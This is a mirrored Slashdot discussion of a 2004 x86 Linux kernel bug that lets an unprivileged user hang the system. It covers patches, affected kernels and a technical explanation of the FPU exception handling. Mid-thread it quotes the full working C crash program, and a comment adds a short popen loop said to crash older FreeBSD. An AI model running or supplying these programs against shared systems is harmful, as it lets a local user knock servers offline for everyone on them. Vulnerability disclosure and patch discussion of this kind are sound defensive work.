Slashdot Mirror
New Linux Kernel Crash-Exploit discovered
Ant writes " According to linuxreviews article's on 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture. This exploit can be compiled and run without a root access and with a shell access. There are detailed information and source code mentioned. " You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read article for the full details.
There are goods and bads, however, the information is readily available. There are patches that "work", even before a full explanation is available. Now, thousands of people are actively working on a solution, if they so choose. If they don't choose, they can use the proprietary code method - wait for the official vendors to release a patch.
In proprietary land, a vendor would first sue the person who released the information. Then, the re-iteration that you won't be vulnerable if you use a "properly configured firewall," then they'd start working on a fix.
Kinetic stupidity has a new brand leader: Allen Zadr.
It doesn't require external programs in order to crash.
Gnusay -- for all your talking gnu needs.
is to buy a mac and run yellow dog on it!
/ducks
you want us to "read" the article and not jump headfirst into an open source vs. closed source flamewar??? :P
#include <stdio.h>
int main(void)
{
printf("I love Windows\n");
return (0);
}
Gentlemen, the time has come for a serious discussion on whether or not to continue using C for serious programming projects. As I will explain, I feel that C needs to be retired, much the same way that Fortran, Cobol and Perl have been. Furthermore, allow me to be so bold as to suggest a superior replacement to this outdated language.
To give you a little background on this subject, I was recently asked to develop a client/server project on a Unix platform for a Fortune 500 company. While I've never coded in C before I have coded in VB for fifteen years, and in Java for over ten, I was stunned to see how poorly C fared compared to these two, more low-level languages.
C's biggest difficulty, as we all know, is the fact that it is by far one of the slowest languages in existance, especially when compared to more modern languages such as Java and C#. Although the reasons for this are varied, the main reasons seems to be the way C requires a programmer to laboriously work with chunks of memory.
Requiring a programmer to manipulate blocks of memory is a tedious way to program. This was satisfactory back in the early days of coding, but then again, so were punchcards. By using what are called "pointers" a C programmer is basically requiring the computer to do three sets of work rather than one. The first time requires the computer to duplicate whatever is stored in the memory space "pointed to" by the pointer. The second time requires it to perform the needed operation on this space. Finally the computer must delete the duplicate set and set the values of the original accordingly.
Clearly this is a horrendous use of resources and the chief reason why C is so slow. When one looks at a more modern (and a more serious) programming language like Java, C# or - even better - Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.
So what does this mean for the programming community? I think clearly that C needs to be abandonded. There are two candidates that would be a suitable replacement for it. Those are Java and Visual Basic.
Having programmed in both for many years, I believe that VB has the edge. Not only is it slightly faster than Java its also much easier to code in. I found C to be confusing, frightening and intimidating with its non-GUI-based coding style. Furthermore, I like to see the source code of the projects I work with. Java's source seems to be under the monopolistic thumb of Sun much the way that GCC is obscured from us by the marketing people at the FSF. Microsoft's "shared source" under which Visual Basic is released definately seems to be the most fair and reasonable of all the licenses in existance, with none of the harsh restrictions of the BSD license. It also lacks the GPLs requirement that anything coded with its tools becomes property of the
FSF.
I hope to see a switch from C to VB very soon. I've already spoken with various luminaries in the C coding world and most are eager to begin to transition. Having just gotten off the phone with Mr. Alan Cox, I can say that he is quite thrilled with the speed increases that will occur when the Linux kernel is completely rewritten in Visual
Basic. Richard Stallman plans to support this, and hopes that the great Swede himself, Linux Torvaldis, won't object to renaming Linux to VB/Linux. Although not a C coder himself, I'm told that Slashdot's very own Admiral Taco will support this on his web site. Finally,
Dennis Ritchie is excited about the switch!
Thank you for your time. Happy coding.
Let's just hope they're not browsing for pr0n.
"Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged)."
Hope you all had a great weekend!
Is it out already? If not, I hope they tell us promtly. I want to apply the patch as soon as I can.
x86, oh yes, I'm pro.
here's a direct link to the patch.
;)
not whoring.
That must be the new fangled counting system is it?
Something like hex, only it's got the whole alphabet in it, which makes it fun to use on calculators, making it easier to say "BOOBIES".
x86, oh yes, I'm pro.
... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.
Some questions I have to those who may have been following this:
Does the crash occur without the syscalls in the signal handler/main process?
Does the crash occur on SMP machines?
Does the crash occur with other signals (PIPE, USR1, etc.)
Does the crash occur on ppc, sparc, etc?
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Visual Basic better than C? Surely you're smoking Crack.
#include
./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels versions die when evil is executed.
/usr/src/ /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).
/usr/src/linux-2.4.26 2.4.26-rc3-gentoo.
/usr/src/ /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo" /usr/s
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil &&
The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x (vanilla) Kernels
Stian Skjelstad mailed me a working patch 2.4 kernels.
2.4.26
I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
5. Apply the patch
* patch -p1 -d
1. Get a vanilla 2.4.21 kernel and install it.
2. Apply the patch
* patch -p1 -d
I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any Gentoo-only tools.
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d
8. Configure your kernel
* Using your old config: cp
Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
How many systems deployed in real world enviorments give anyone other then IT staff shell access?
DeviantArt Page
NSFWIt's called Base64.
...having programmed in VB for the last 8 years doing kernel level programming...
I think you'll need to clarify that for us slashdot folk.
It must be an exploit in the SCO code that is in the Linux kernel!
;)
... It's ok. remember, not many people know about this yet. ...... ......
Oh God! How to I update Fedora Core 2!!!!
May the Maths Be with you!
Well, those who have been paying attention know that Linux has had quite a few (read: way too many) critical bugs in the past year. Most of them were related to do_mremap (how many times do they have to "fix" that until its fixed?!), varying in severeness from DoS to local root exploits. How many has the Windows kernel had in the last 12 months? I am afraid that this comparison might fall out to the advantage of Windows. Until you take into account time to fix, maybe. Off to patch my systems...
Please correct me if I got my facts wrong.
I thought Monday's were supposed to be Windows patch days, Tuesdays were for Linux, Wednesday was Apache, Thursday was Windows again, Friday was SSH...
The article says it affects x86 (and x86-64) only.
So itanium, ppc, etc. are safe. But my other questions still remain.
Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
go to the trouble to get a paid for shell account at a provider, or a freebie I guess, then run this script, just to destroy their own account basically?
Or is the bigger danger is that this script would be the payload that is included within some linux worm?
Just wondering what this means for joe average home linux user who isn't running a server.
Since when did Linux run VB programs without Wine? If so, I missed that news flash.
x86, oh yes, I'm pro.
Your sysadmin needs this advice:
If your system is a production server with 1000 on line users then do not test this code on that box.
No, it's not because C is being used here. It's because assembly is being included in the program. If you weren't able to compile the inline assembly, you wouldn't be able to compile this program on a specific system. Plus, you can just create a raw ELF binary that has this assembly instruction in it (if you knew all the opcodes, etc.) and crash a system. This has nothing to do with the language that is being used.
...not to mention the fact that the Linux kernel itself lacks any support for any type of journaled
filesystem, memory protection, SMP support, etc...
I think I just got 0wn3d.
I'm going to go back to lurking now.
And fixes will be deployed within hours.
The same cannot be said of many proprietary OSes...
The fact that a patch is available doesn't mean that it is a non-issue. In many cases system administrators are too busy, lasy or do not wish to interrupt services, to update their systems to fix these software vulnerabilities. The proprietary vs. non-proprietary argument is irrelevant if administrators fail to keep up-to-date with security fixes. A good example of this was the SQL Slammer worm that made it's rounds several months after a patch that fixed it's attack vector was released.
Simply put, the bigger problem is with the wet-ware than the development methodology.
Yet another reason why there's alternatives to Linux...
Both RHEL 2.1 (2.4.9-e40) and RHEL 3 (2.4.21-15) are vulnerable, which means that Red Hat back-ported this bug into their 2.1 product line. Nice!
Bus error in your favour. Collect 200kB
This can be executed on any webhost with ftp access and a cgi-bin.
Slashdot blurb about Windows bug
Linux trolls: Windows sucks!!!
Slashdot blurb about Linux bug
Linux trolls: Windows sucks!!!
Martin
If your system is a production server with 1000 on line users then do not test this code on that box
Mwahahahahah !!! They can't be serious !Ok, i vill test evil.c on some other boxen ...
With that aggravating beauty, Lulu Walls.
In the real world, where I work, I run a Hybrid network where I'm still waiting for Windows XP Service Pack 2 to come out in a finalized form because I don't have an option to pull just the parts that I need, and SP2 RC2 is not quite ready to unleash on my network (although I have actively TESTED it). Of course, this just fixes some vulnerabilities that have existed for over a year.
Don't tell me that I, as a Windows User and Administrator, don't care. While I've ignored this kernel issue over the weekend, I get to actively compile come kernel patches and test those. I'll bet, even before my testing, that I'll be able to have a production solution by tomorrow. Even if SP2 releases this afternoon, I'll still have to test it before deployment, so the Linux solution will be in production first.
Kinetic stupidity has a new brand leader: Allen Zadr.
FTFA (From The Fine Article):
``This doesn't affect NetBSD Stable.''
The exploit code also doesn't work on Windows 95, nor on Menuet. I haven't tested SkyOS, because I don't have a license.
Please correct me if I got my facts wrong.
Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:
So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
Gee, based on what /.'rs are always posting, I thought Linux could run forever and was uber-invulnerable...
This makes me respect Windows-crashing apps a little more (or less, depending on how you look at it),in that people can crash Windows w/o benefit of the source code! It's really amazing.
stuff |
I myself program in a variety of languages, and while each may have it's uses, I'm afraid I can't agree with your assessment. I generally use C++ over C most of the time, but I would certainly stick with C over VB (and yes, I do program in VB as well, when the occasion requires.). Just beacuse a language has an impressive GUI does not make it more valid. In fact, it can often increase the chances that a programmer is churning out code without truly understanding all that it's doing. Just my two cents, of course.
I think this is a joke but with the amount of idiots out there it's hard to be certain.
I know this is a cut and paste troll, but for best effect use 'PERL' instead of 'Perl' or 'perl', makes you sound even more like you are talking out of your ass.
Thanks!
You have a superb feeling about this level!
You sense the presence of monsters!
######
#...@+TTTTTTTTTTTTTTTTTTT
#....#
######
You hear a door burst open!
You die (more)
Don't get me wrong, I enjoy Linux, but keep in mind, the article is 3 days old.
Also, how will I be to apply the patch and where is it? Do I have to recompile my kernel?
If this were a Windows bug, it would have been thoroughly exploited, made the news, and I would have already applied the patch by clicking "Windows Update". A bigger deal would have been made of it, but it would have only taken about a minute of my time.
I do prefer Linux, but we need to be open-minded.
I ran this code on "2.6.5-gentoo-r1 #4 SMP Thu May 27 19:12:27 GMT 2004 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux" and although it didn't crash, gnome started acting all odd, and none of the terminals were responsive. They just kept printing out the prompt. Still, I could browse slashdot while the code was running, and could run some applications. Although when I went to open another terminal it opened 6.
Very vital question for the UML virtual server leasing cottage industry and the customers of same.
If this were to be run on a UML session, what would happen? Would the damage be limited to that UML session, or would the host machine go down?
FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.
He, who dies with the most toys, wins
How do we blame Micro$oft for this?
As for this bug, don't start bashing Linux left and right. Linux isn't perfect, no software is. But unlike when there is a bug in windows a fix is on the way as fast as possible. In fact, there is a patch on the site right now! And for you zealots who say stuff like "No big deal, who is going to do that? No the kind of person you give shell access to." shut up. Admit that Linux is not the perfection in computing.
You know what else makes the kernel crash? At least if you are using 2.6.5 or higher if you enable APIC/APIC-IO and you have an nforce chipset the system will lock up as soon as you do too much I/O.
I'm not sure you understand what motivates the average hacker/geek. Chances are this gets fixed by some guy who is simply trying to get his favourite porn site back up!
People couldn't type. We realized: Death would eventually take care of this.
lol!
I must remember to browse at -1 more often.
73 replies, and as far as I can see nobody has yet said it, so I will:
This ONLY crashes Linux on x86 (or x86-64) systems. Every other architecture is unaffected.
Well it is Microsoft's fault for saying that IE and such are part of the OS, but Windows has had very few kernel exploits in the most recent few years; it is mostly IE holes and, prior to IIS 6, IIS holes.
This was made worse by the fact that many people run as admin and IIS used to run as LocalSystem on default installs.
However all software has bugs; this incident is neither proof positive or proof negative of any argument re: open source vs closed source.
Natural != (nontoxic || beneficial)
The good thing about Linux patches is that they are cumulative whereas Windows likes to start over (for the most part) every couple years with a fresh, untested system. Microsoft, with all of their billions, don't even offer hackers an incentive to find bugs in a pre-release version. If they did this, their security and corporate image would be improved.
But they're a monopoly, so what do they care?
Life is the leading cause of death in America.
feh. i can do both at the same time.
Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC. Outlook Express exploits, MSN Messenger exploits, BlackICE exploits, RPC exploits, IIS exploits, IE exploits. You can even root them in masse without even gaining initial access to the box. This linux exploit allows you to crash the box if you have an account. What moron paying for a shell account is going to do that? Or what type of cracker is going to give himself away simply to crash the box?
Can you still outright crash NT by sending too many backspaces to the console?
It's a pity that there is no moderation like "Funny Troll +1". I'd mod you up man. "Dennis Ritchie is excited about the switch" ... pure brilliance. And VB/Linux ... so obvious when you think about it.
Hmmm. Tempted to cut and paste this into a VB newsgroup ... heh heh. I'm sure there'd be a groundswell of support. [insert evil sarcastic laugh]
Bitter and proud of it.
You think that Fortran, Cobol and Perl have been retired?
By any chance would you or anyone you know have a Citibank credit card? A fact you may not be aware of that most of Citibank's back end is written in Cobol. Federated Insurance is another organization that has plenty of Cobol based systems and when last I checked, neither company has any plan to change it.
Yes, there are newer and possibly 'better' language out there, does that make them better in all such cases? Hell no.
When speaking with a Federated representative she proudly said that their database backend system was completely Cobol based and was faster and more efficient then anything else on the market. It too me a little while to realize that she wasn't saying that it could process a days worth of transactions faster than anything else on the market with newer hardware, the issue was the cost of upgrading.
If you have millions of lines of code in an older language and a database system that has been in place for 20+ years... it's not easy to upgrade no matter the advantages. If you worked for such a large company, it'd be pretty easy to sell something new, but do you want to guarantee a seamless transition from one system to another? Any hiccups along the way will most likely make the transition be regretted.
Same goes for C. Yes, Java and other languages might be able to do a better job, the fact is that huge amounts of legacy code exists and needs to be supported.
Example: Linux. Written in C primarily if I am not mistaken. How should it be fixed? Should it be ported to C++? VB? Java? C#? Such a conversion *may* be possible, however even if it were, the potential benefits to be realized are so inconsequential compared to the cost of doing so to make such an endeavor be wasted.
Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.
I'd suggest you do some research on that point. Raw C/C++ tends to be a hell of a lot faster than VB. Yes, you can often create a front end in VB much faster than you can in C. I would remind you though that in C/C++ you can create far more dynamic and elegant code for your task. In fact, the advantage of C++ over VB I think can be summed up in a single word: Inheritance.
As a programmer who spends about 1/4th of his time working in embedded systems (not the niceties of XP embedded mind you, but micro controllers and other such horrors), I can tell you that VB has no place in such a world.
Hell, I'd love to see an 8051 VB compiler, just to for a laugh.
Help Brendan pay off his student loans
I guess everybody missed the sarcasm.
This sig is the express property of someone.
Beware of patch.
It could be another Linux Kernel 2.4.11
No it would not of been thoroughly exploited if it was a windows box.
Because..... guess what, this is a multi-user bug. They need to have an account on the machine. If it was windows, they can take root right away, which is much worse then crashing a machine.
This type of problem has never been solved on windows, and probably never will.
Does this CSRSS Bug still take down Windows XP boxes?
Baz
The article doesn't attempt to explain anything.
(Someone please correct me if I have this wrong)
After poking around in the LKML, I've mostly figured it out.
The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the exception is attempted to be delivered to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a non-existant instruction. The exception handler would jump off into space trying to deliver SIGFPE...
So they changed __clear_fpu (which is called when doing a initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.
Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Linux has been plauged by local exploits for a long time, but you have to get on the server FIRST. Windows has a lot of exploits that happen _remotely_ and give people control of the machine. More often than not Linux exploits crash a daemon or cause a DOS but do not take down the machine itself. I'm not defending Linux, but the gravity of Windows problems is typically orders of magnatude worse than exploits on Linux. And at least with Linux you can often do damage control because they tell you what the problem is and possible work arounds - windows you wait until MS gives you an update, and possibly will tell you what the problem was that your servers were vulnerable to for the last month or three.
It's good reading for anybody interested, however, unlike slashdot, registration is required.
Kinetic stupidity has a new brand leader: Allen Zadr.
noob, l00s0r ... renice this process and everything is ok ;)
unless it included a time bomb aspect to it as well? Some RK with the new shiny kernel crash script might wait until such a time as the number of zombies was high enough to get the desired effect maybe. I dunno, sploits are outside my expertise, never had any desire to engage in malicious sport or exploiting for some other profit. Perhaps these dudes might use it in the irc wars or something.
I year or two ago, this simple program used to do the same for FreeBSD:
#include <stdio.h>
main() {
FILE *f;
while (1) {
f = popen("date","r");
}
}
The good thing about Linux patches is that they are cumulative whereas Windows likes to start over (for the most part) every couple years with a fresh, untested system.
WTF? By that logic... when I install a Windows 2000 machine, in order to be completely up to date, I need to install Service Pack 1, then Service Pack 2, next onto Service Pack 3, and then Service Pack 4... and if I have time, DL all of the patches from WindowsUpdate.com, sadly... that'd be wrong.
Microsoft patches and operating systems are cumulative. Whenever XPSP2 is releases, it will provide all XP bug patches up to a certain date along with it's other improvements, including all of those offered in SP1.
Along the way, each bug that is patched in 2k and XP these days is also fixed in Longhorn. This is common practice at MS and has been for years.
Help Brendan pay off his student loans
(this is illegal in most parts of the world and strongly discouraged)."
I don't understand - which bit is illegal?
Taking down "lame free-shell providers"? OR
Taking down "free-shell providers" in general? OR
Providing free shells?
Anyone else getting repeatedly unsubscribed from bugtraq and the other securityfocus mailing lists? About once a month I get an email from them claiming my email was bouncing (often because their DNS was sending it to the wrong machine!). And about once a month I don't get the email, and am unsubscribed from a random list. Which really sucks, because it takes a few days to realize, and then you've lost a few days'-worth of important announcements.
I'm just curious whether this is a widespread problem; since I'm fairly certain my connection isn't flaky, the problem must be at their end.
Not to critize the open source methodology too much, but I wonder what sort of numbers we're actually talking about here. Any ideas?
2000 people would be in the ballpark of your high school population, or a large concert crowd. That's a lot of kernel hackers.
``Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC.''
Yes, and who says these aren't present on Linux systems? Do you claim that all Linux distros have been as heavily assaulted as Windows, and kept up? I don't think so, and therefore I don't think we can say anything about the security of a Linux + libs + apps system.
Please correct me if I got my facts wrong.
Mind you, at the risk of replying to myself it is worth noting that the patch currently available actually does nothing more meaningful than checking to see if the code that got you there is this exact exploit or not... so I would expect a better patch to be coming out that actually deals with the real problem, which appears to be that some poor munchkin started to write an FPU exception handler somewhere near version 2.3 and got distracted before finishing it. I assume though that the production of such a patch implies working out what the dude actually meant to do, first.
I just hope it doesn't take too long to get a 2.6 patch out.
Karma: Segmentation fault (tried to dereference a null post)
I think you'll need to clarify that for us slashdot folk
Not even Microsoft is stupid enough to do kernels in VB... so what OS uses VB? (and this would be pre-CLR VB...)
Yeah!!!
I mean with Perl.com typing it as Perl all over the site, not to mention Larry Wall's Very Own Perl Page typing it as Perl, you'll look l33t spelling it as PERL!
For the record, I didn't read it as a troll, but as humour...
-- Andy Jeffries Scramdisk for Linux (Change the orgy to org to reply)
Oops, never mind, didn't read the whole thing ;)
use Base255 (ascii)
The article mentions "This doesn't affect NetBSD Stable." Why would a Linux Kernel flaw effect any version of *BSD?
Okay, let us start with the beginning:
A) Do you have other users using your system (and I don't mean your hypothetical non-geek girlfriend)
B) Can you trust these users not to run this kind of thing?
If (A) = Yes and (B) = No : If you are, i think you need to learn a bit more about Linux very very urgently, being sysadmin to a "public" server is not something to undertake lightly.
In all other cases : relax, you're unlikely to get hit by this exploit at short notice. If you are running a standard distribution, check for available updates for that distro, if you are running something like Gentoo, compiling a fixed kernel shouldn't be too difficult.
In short : anyone who is truly at direct risk from this should already know enough to react appropriately. This is a *local* exploit, so script-kiddies cannot 0wn your machine using this across the internet, unless they've already broken into the machine. Even if they have, the worst they can do is crash it, they cannot give themselves elevated privileges and do any real damage.
And about the Windows "Update": If this were a Windows issue, it would probably be classed "Like, totally non-critical" and be fixed months later in a fixpack, as no remote exploit or privilege escalation is involved...
Obviously PERL is widly popular, but I think many Slashdotters would be surprised at how widely used FORTRAN and COBOL are.
Am i the only one who got this joke ? mod this guy up.
- People who believe other people have no right to live, got no right to live ...
This bug was posted on slashdot as a comment reply to the Assembly programing article a few days ago. I looked at it then and it locked up my machine nicely.
Aside from that, I don't know that your point is valid. Most linux users either know how to use patch and compile their own kernels, or can run up2date or whatever to download their latest prefab clutter. Also worth pointing out is this bug needs a shell to run the program and crash the system. If you're giving out shells and don't know how to use patch, this is the least of your worries.
The patch is linked from another comment in this thread and yes, you'll have to recompile your kernel. No one has access to my machines here but me so I'm not going to bother updating until 2.6.7 is released. Have a good one.
Also, how will I be to apply the patch and where is it? Do I have to recompile my kernel?
If you had read the article, you would know that they provide the patches right there for (I think) ever affected kernel.
A bigger deal would have been made of it, but it would have only taken about a minute of my time.
A minute of your time, a few weeks of Microsoft's time.
VB and Java faster than C? What compiler were you using?
I do prefer Linux, but we need to be open-minded.
That is in part due to the fact that windows is more apt to having security holes that are exploited by automated virii and worms. Those dont necessarily require machine access. You can simply contract them by being on a network with your machine on. Every windows machine will have the same hole. Becoming an administrator appears to be fairly trivial.
Linux is a bit different in that most bugs reported are due user enabled software. If you have a machine that you dont want exploited you just dont enable certain slutty services. Windows enables them by default. Also most processes in linux run as a specific user in chroot jail. Even if they were exploited the exploiter can usually just corrupt data tied to that service. Doesnt mean linux is anymore secure but it would appear that it is a little more contained when broken.
Are you intolerant of intolerant people?
Some explanation in order - the program doesn't just kill them outright: it has two threshold levels (warn and error, both can be set at runtime) if the student uses over 90% CPU time in 20 seconds it trips an error, over 50% in 20 seconds tripss a warning, for example. When either of those levels is exceeded it is logged and they get a message on their tty (if possible) telling them about it. They are also shown a log of hits when they log in. The students can exceed either level a number of times - say 10 warnings and 5 errors after which it is killed. If students genuinely have to do very intensive processes then they can ask us to add them to an ignore list while they are doing it. I'll probably add options to renice, limit memory and other things eventually, this was a quick hack. The problem wiht ulimit is that it does the limiting but doesn't give the users sensible information about it - I need to give them easy to understand error messages about what they've done wrong.
YHBT. YHL. HAND.
Acutally I was ROTFLMAO when I read the post. I guess some people take longer than others to start their sense of humor on a Monday.
It was funny, but I've seen variants of this posted several times before (I think it might even have been a KTB[1] original).
[1] I think that same guy was "kiss the blade", "lover's arrival", and "twirlip of the mists".
the clue flew by, but still sends you greetings, young master. Dig into the history books to find thet FORTRAN and COBOL are properly spelled with all caps (due to case insensitive terminals back then). The next clue will be iver in 30 minutes if you still need to catch a ride.
I know this is a cut and paste troll, but for best effect use 'PERL' instead of 'Perl' or 'perl', makes you sound even more like you are talking out of your ass.
Huh? The post was clearly a joke, not a troll. And, as the name in question is acronym for Practical Extraction and Report Language I think PERL is a perfectly valid way of writing it, if a little old-fashioned.
I would have already applied the patch by clicking "Windows Update"
You actually apply those things? That's like OS Russian Roulette!
Linux/Open Source/Anti Microsoft News
Use `up2date -u`. I think it's also possible to use `yum` or other commands, though I'm still in the process of getting up-to-speed with Fedora 2..
God I wish I could edit posts.
The issue isn't that the context is gone... the issue is that the kernel is executing a non-waiting FPU instruction i.e. "fwait" on returning from the a context that flushes a user thread (i.e. return from signal handler, syscall after execve). Triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.
What's really weird is I found this document, which details the potential problems of trying to use the FPU in a interrupt handler in the Linux kernel.
They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...
Well, you can't really call it that, though. It's was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
You can limit all those with user limits on number of processes, CPU usage, disk quotas etc. Any machine with public shell access should have those set up. This bug is different.
Removing the compiler wouldn't help, anyway - presumably most systems with public shell access also have some sort of ftp access. You could even rig up something to echo the binary to a file through a terminal, I'm sure.
It's interesting to see how such an obvious troll gets modded as funny.
It's even more interesting to see how such an obviously sarcastic and humorous post gets labelled "troll".
Sure, if you don't read the last paragraph, it's a troll. But come on.... "Admiral Taco", "the great Swede himself, Linux Torvaldis", "VB/Linux".
Thats gold Jerry.... GOLD!!
I suppose the answer is not allow access to a compiler for non-trusted shell users.
Please do not forget to deny using keyboard keys representing hexadecimal digits, i.e. A-F and 0-9 to untrusted users.
There you are, staring at me again.
Did you actually read it? I think it was the best troll parody I've seen for a while. I mean, the author clearly understood exactly what he was talking about when discussing C's support for pointers, which means that the way he missed the point and described them as 'inefficient' is marvelous.
Also, in light of recent events concerning the ADTI 'Samizdat' book & the author getting Tanenbaum's nationality wrong, describing Linus Torvalds as a Swede is a masterstroke.
The thing about Windows bugs is that many of them are remotly exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.
--
I Hit the Karma Cap, and All I Got Was This Lousy
even the moderator - +1 Interesting... :-/
That man tried to kill mah Daddy
If so, I missed that news flash.
I think you also missed your sense of humor...
A troll, but a funny one. I just hope the guys in M2 get it...
I have a "very nearly vanilla" 2.4.26 kernel - all that's patched are some netfilter things for more targets. This patch didn't work for me - the patch went fine (my signal.c is no different from vanilla), and the resulting kernel booted fine, but the exploit still crashed my box. I'm using gcc-2.95.4 , Debian 3.0 (Woody). No I didn't forget to run lilo or whatever (i'm using Grub). Any ideas?
...because I don't think OSS has any "magical" powers to produce bug-free code, only better bug finders (In the CSS world, if it works you leave it alone. In Linux there's always someone tinkering with it). So, starting with the same codebase, Linux would appear to have more bugs to begin with, then less. Or maybe it's more buggy, work-in-progress like. It's very hard to tell, really.
Also note that if Windows had a "shell exloit" for non-admin users, the only thing it'd do for 99,9% of the users out there is to crash the users own machine. I wouldn't want to try doing with Windows what you do with Linux...
Kjella
Live today, because you never know what tomorrow brings
their inspiration of a false sense of security? :P
..I am afraid that this comparison might fall out to the advantage of Windows ...and how do you know this exactly?
I'm sure there is a comparable (if not greater) amount of critical bugs in windows's kernel that because of its closed nature we don't ever get to see or MS sweeps under the carpet without the public ever knowing they exist until someday they're found.
[alk]
Heretic! Everyone knows it's the Pathologically Eclectic Rubbish Lister.
That's not much of a solution; I'd just compile the binary on another system with matching library versions and then upload and execute it on your machine.
Additionally, the my programming launguage is better than yours conversation is off-topic and grossly redundant, and I apologize for helping it to continue
(Score:-1, Flamebait)
Apology accepted.
hey, at least linux trolls are consistant, unlike windows :)
No, YOU are an ass. An obvious troll, and you swallowed it hook, line and sinker. You read something that says that Alan Cox is excited about switching to VB and didn't smell a rat? Bwahahahahah!
infinite loops can crash systems? who'da thunk it!
`` Linux has been plauged by local exploits for a long time, but you have to get on the server FIRST.''
...
For that, you use the same techniques as on Windows: vulnerabilities in daemons, CGI scripts, trojans, backdoors,
Please correct me if I got my facts wrong.
Here's how:
Add compiler group:
Move to correct directory:
Make most common compilers part of the compiler group
Set permissions
To add users to the group, modify and change to '123' will be different on your installation.
Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
"I filter at +6, and have yet to miss out on an important comment." (#822545)
